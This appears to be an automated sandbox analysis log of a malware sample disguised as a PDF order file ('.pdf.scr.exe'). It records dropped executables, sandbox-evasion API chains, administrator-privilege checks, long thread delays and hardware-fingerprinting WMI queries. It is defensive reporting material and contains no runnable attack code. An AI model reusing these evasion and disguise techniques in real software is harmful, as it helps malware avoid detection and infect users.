Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Evaded block: after key decision			graph_0-71524
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Evaded block: after key decision			graph_0-72433

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\System32\SensorDataService.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

API coverage: 5.3 %

Source: C:\Windows\System32\alg.exe TID: 7368	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 7348	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe TID: 7480	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 7504	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -38738162554790034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98394s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98276s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -98047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -97016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96680s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96161s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -96028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95796s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95681s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95442s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -95094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94749s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94279s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94167s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -94016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -93899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -93765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99863s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8128	Thread sleep time: -99515s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 7856 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 1731 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8188	Thread sleep time: -287460000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8188	Thread sleep time: -299940000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8104	Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 7540	Thread sleep count: 483 > 30
Source: C:\Windows\System32\msdtc.exe TID: 7540	Thread sleep time: -48300s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 7912	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99874
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99513
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99375
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98757
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98507
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98394
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98276
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98156
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98047
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97937
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97719
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97594
